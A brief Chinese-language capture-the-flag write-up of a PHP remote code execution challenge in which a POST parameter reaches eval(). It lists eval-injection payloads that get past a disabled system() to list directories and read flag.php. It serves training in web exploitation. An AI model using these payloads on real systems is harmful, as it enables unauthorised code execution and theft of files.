这是一道远程代码执行漏洞,我们先查看源代码
发现这里是使用POST方式传参给$c,再通过eval()函数来执行输入的内容
我们可以打开hackbar来进行POST提交
这里提示我们system()函数被禁用了,我们尝试其他命令
我们可以用 scandir() 函数来读取目录,并用 print_r() 或 var_dump() 打印出来
发现有一个flag.php我们尝试查看该目录中的内容
c=echo file_get_contents('flag.php');
c=highlight_file('flag.php');
c=readfile('flag.php');
c=show_source('flag.php');
